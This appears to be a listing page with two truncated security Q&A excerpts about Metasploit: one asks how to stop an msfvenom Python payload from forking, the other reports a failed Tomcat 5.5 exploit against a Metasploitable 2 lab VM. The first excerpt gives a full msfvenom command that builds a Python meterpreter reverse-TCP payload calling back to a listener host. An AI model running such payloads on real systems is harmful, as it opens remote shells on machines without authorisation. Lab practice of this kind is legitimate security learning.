How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw –platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=9090 -o stageless_payload.py
The payload … Continue reading How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

Cannot exploit Metasploitable 2 VM using Tomcat 5.5 on Metasploit with Parrot OS

I’ve being trying to perform a simple exploit with msfconsole on Metasploitable 2 without any results.
I’m using a host-only network adapter with DHCP enabled so I’m getting 192.168.56.104 on the Metasploitable VM and 192.168.56.1 on the … Continue reading Cannot exploit Metasploitable 2 VM using Tomcat 5.5 on Metasploit with Parrot OS